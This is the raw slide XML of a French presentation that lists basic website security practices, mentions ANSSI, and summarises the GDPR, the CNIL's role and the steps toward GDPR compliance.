        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4565676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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449081" y="450668"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’ANSSI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26CFA99-5B53-4B8D-9874-E0D86D67CC08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997214" y="659673"/>
            <a:ext cx="4271124" cy="5956663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE09C95D-2C3A-406E-8436-4DFFF464EA4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7527280" y="659673"/>
            <a:ext cx="4490933" cy="5956663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153009481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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614427" y="460948"/>
            <a:ext cx="10963145" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bonnes pratiques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6809991A-7B99-44A4-A190-3C417B2B2DB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614427" y="1690220"/>
            <a:ext cx="10272009" cy="4455835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="25000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mettez à jour vos scripts et applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Filtrez les données d’entrées.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Utilisez des mots de passe forts.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supprimez les comptes utilisateur abandonnés.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supprimez les dossiers d’installation.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ajoutez un certificat TLS (HTTPS).</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Utilisez un protocole SSH ou SFTP.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lancez un scan de sécurité.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="0" i="0" dirty="0">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9473375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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043428" y="3007625"/>
            <a:ext cx="3826944" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20888649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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>LA CNIL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D074F488-0647-41B3-82E2-E4D667A6D5E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228254" y="1886424"/>
            <a:ext cx="5136020" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="75000"/>
              <a:alpha val="70000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RGPD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> signifie « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Règlement Général sur la Protection des Données</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> »</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F68D562C-E840-43D8-8238-F886C4C325F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228254" y="2927430"/>
            <a:ext cx="5136020" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="75000"/>
              <a:alpha val="70000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RGPD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> encadre le traitement des données personnelles sur le territoire de l'Union européenne. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A84B7F-9996-467C-8B6E-9D1FE1E149BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6228254" y="4303587"/>
            <a:ext cx="5136020" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="53000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Le but</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RGPD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> d'augmenter la protection des utilisateurs en matière de données personnelles ainsi que les accès à celles-ci</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="ZoneTexte 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B74A7F-37D1-4542-8E72-7BC944B7AA1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2345076" y="5947236"/>
            <a:ext cx="7501847" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.cnil.fr/fr/reglement-europeen-protection-donnees</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C7EAAB-EAF6-4D77-9172-C4245BED6F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694729" y="1845067"/>
            <a:ext cx="5136020" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Commission nationale de l'informatique et des libertés (CNIL) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>est le régulateur des données personnelles. Elle accompagne les professionnels dans leur mise en conformité et aide les particuliers à maîtriser leurs données personnelles et exercer leurs droits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La loi Informatique et liberté est remplacée en France par le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RGPD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> en mai 2018.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"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41787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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694729" y="554468"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le RGPD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F68D562C-E840-43D8-8238-F886C4C325F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4830528" y="1536174"/>
            <a:ext cx="6168398" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="75000"/>
              <a:alpha val="70000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>La mise en conformité au RGPD passe par plusieurs étapes successives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1- Recenser les traitements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2- Faire un tri dans les données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Informez les personnes dont vous traitez les données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4- Sécurisez les données</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C7EAAB-EAF6-4D77-9172-C4245BED6F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864062" y="1536174"/>
            <a:ext cx="3472322" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
